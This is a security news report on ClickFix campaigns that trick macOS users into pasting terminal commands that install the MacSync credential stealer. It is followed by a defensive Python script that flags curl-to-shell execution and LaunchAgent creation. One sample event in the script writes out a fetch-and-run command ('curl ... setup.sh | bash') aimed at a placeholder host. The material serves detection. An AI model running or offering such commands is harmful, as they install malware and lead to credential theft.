Researchers have identified three separate ClickFix campaigns delivering a macOS information stealer called MacSync through fake AI tool installers, according to The Hacker News. The attacks do not rely on a software flaw. Instead, they trick users into copying and executing terminal commands, which then fetch and run the malware.
The technique marks a continued shift toward social-engineering-led malware delivery on macOS. In these campaigns, victims are lured by bogus AI or productivity software pages and told to complete installation steps manually. Once executed, the command chain can download MacSync, a stealer designed to harvest browser credentials, cookies, autofill data, wallet information, and other system details commonly used for account takeover or follow-on intrusion.
The main risk is that the attack bypasses the assumptions many users make about malware infections. There is no exploit, no drive-by download, and often no obvious warning beyond the request to paste a command into Terminal. That user-driven execution can also reduce the effectiveness of defenses focused on malicious binaries or browser exploits. For companies, a compromised Mac could expose cloud sessions, email accounts, internal apps, and even VPN access if credentials or tokens are stored locally.
ClickFix-style attacks have grown across platforms over the past two years, often using fake CAPTCHA pages, browser update prompts, or software setup screens. The MacSync activity shows the same playbook now being adapted to the strong demand for AI tools, where users may be more willing to install apps from unfamiliar sites and follow unusual setup instructions.
Defenders should watch for suspicious terminal activity involving tools such as curl, bash, sh, or osascript, along with unexpected LaunchAgent creation and unusual outbound connections from user devices. The simplest user guidance remains effective: legitimate software should not require copying shell commands from a website just to install.
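The terminal and LaunchAgent signals above can be expressed as a small triage rule set; this is an added example, not code from the researchers or the original report. The event schema (`type`, `host`, `parent`, `process`, `cmdline`, `path`), the terminal app names, and the sample events are assumptions constructed for illustration, and outbound-connection monitoring is not covered.

```python
import re

# Interpreters named in the article's guidance (zsh added as the macOS default shell).
INTERPRETERS = {"bash", "sh", "zsh", "osascript"}
TERMINALS = {"Terminal", "iTerm2"}  # assumption: common terminal app names
# A curl download whose output is piped straight into an interpreter.
PIPE_TO_INTERP = re.compile(
    r"\bcurl\b[^|]*\|\s*(?:sudo\s+)?(?:/bin/)?(bash|sh|zsh|osascript)\b")
LAUNCH_AGENT = re.compile(r"^(/Users/[^/]+)?/Library/LaunchAgents/[^/]+\.plist$")

def flag_event(ev):
    """Return the list of reasons an event looks like ClickFix-style activity."""
    reasons = []
    if ev["type"] == "exec":
        if PIPE_TO_INTERP.search(ev["cmdline"]):
            reasons.append("download piped to interpreter")
        if ev["parent"] in TERMINALS and ev["process"] == "osascript":
            reasons.append("osascript launched from terminal")
    elif ev["type"] == "file_create":
        if LAUNCH_AGENT.match(ev["path"]) and ev["process"] in INTERPRETERS | {"curl"}:
            reasons.append("LaunchAgent written by script interpreter")
    return reasons

def triage(events):
    """Group flagged reasons per host; hosts with more distinct reasons rank first."""
    per_host = {}
    for ev in events:
        for reason in flag_event(ev):
            per_host.setdefault(ev["host"], set()).add(reason)
    return sorted(per_host.items(), key=lambda kv: (-len(kv[1]), kv[0]))

# Constructed sample events (hypothetical hosts and URLs, not from a real incident).
SAMPLE_EVENTS = [
    {"type": "exec", "host": "mac-01", "parent": "Terminal", "process": "zsh",
     "cmdline": "curl -fsSL https://downloads.example.invalid/setup.sh | bash"},
    {"type": "file_create", "host": "mac-01", "process": "bash",
     "path": "/Users/alice/Library/LaunchAgents/com.example.helper.plist"},
    {"type": "exec", "host": "mac-02", "parent": "Terminal", "process": "curl",
     "cmdline": "curl -O https://downloads.example.invalid/notes.pdf"},
    {"type": "file_create", "host": "mac-03", "process": "installer",
     "path": "/Library/LaunchAgents/com.example.vendor.plist"},
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(host, sorted(reasons))
```

A plain file download and a LaunchAgent written by a package installer are deliberately left unflagged, since both are routine on managed Macs.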




